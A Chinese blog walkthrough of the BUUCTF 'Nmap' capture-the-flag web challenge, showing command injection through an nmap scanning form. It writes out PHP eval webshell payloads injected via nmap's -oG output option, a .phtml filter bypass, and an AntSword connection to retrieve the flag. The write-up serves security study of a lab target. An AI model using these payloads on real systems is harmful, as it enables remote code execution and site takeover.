当前位置: 首页 > news >正文

BUUCTF——Nmap

news 2025/7/4 8:50:14

BUUCTF——Nmap

进入靶场

在这里插入图片描述

类似于一个nmap的网站

在这里插入图片描述

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

在这里插入图片描述

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

在这里插入图片描述

应该有过滤 加了个\

直接构造个php木马上传试试

127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

在这里插入图片描述

在这里插入图片描述

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

在这里插入图片描述

拼接访问一下成功上传

在这里插入图片描述

用蚁剑连接看看

成功连接

在这里插入图片描述

接下来就慢慢找flag

在根目录下找到flag

在这里插入图片描述

flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

在这里插入图片描述

http://www.dtcms.com/a/197026.html

相关文章:

  • java的面向对象思想
  • 小蜗牛拨号助手用户使用手册
  • 2.1.3
  • 【基于栈的 Vue3 路由历史管理:优雅处理多系统间的导航】
  • 使用python进行船舶轨迹跟踪
  • 符合Python风格的对象(对象表示形式)
  • 使用HtmlAgilityPack采集墨迹天气中的天气数据
  • 简单神经网络(ANN)实现:从零开始构建第一个模型
  • python项目参考文献
  • 用Python玩转人工智能——数字识别技术 之二
  • QT软件安装
  • 高效完成任务:制定标准与限时完成的双重法宝
  • 三层固定实体架构:高效实现图上的检索增强生成(RAG)
  • 2024 山东省ccpc省赛
  • 【持续更新中】架构面试知识学习总结
  • 回溯法理论基础 LeetCode 77. 组合 LeetCode 216.组合总和III LeetCode 17.电话号码的字母组合
  • 在RK3588上使用NCNN和Vulkan加速ResNet50推理全流程
  • 一阶线性方程 线性方程
  • 设计模式Java
  • C语言指针深入详解(一):内存和地址、指针变量和地址、指针变量类型的意义、指针运算
  • Makefile变量冲突与包含关系解析
  • 多商户商城系统源码解析:开发直播电商APP的技术底层实战详解
  • Android 14 解决打开app出现不兼容弹窗的问题
  • Python-92:最大乘积区间问题
  • 飞帆控件 post or get it when it has get
  • 摩方 12 代 N200 迷你主机(Ubuntu 系统)WiFi 抓包环境配置教程
  • PySide6 GUI 学习笔记——常用类及控件使用方法(常用类颜色QColor)
  • Canva 推出自有应用生成器以与 Bolt 和 Lovable 竞争
  • 第8讲、Multi-Head Attention 的核心机制与实现细节
  • 【电路笔记 STM32】 STM32CubeProgrammer 下载 安装 使用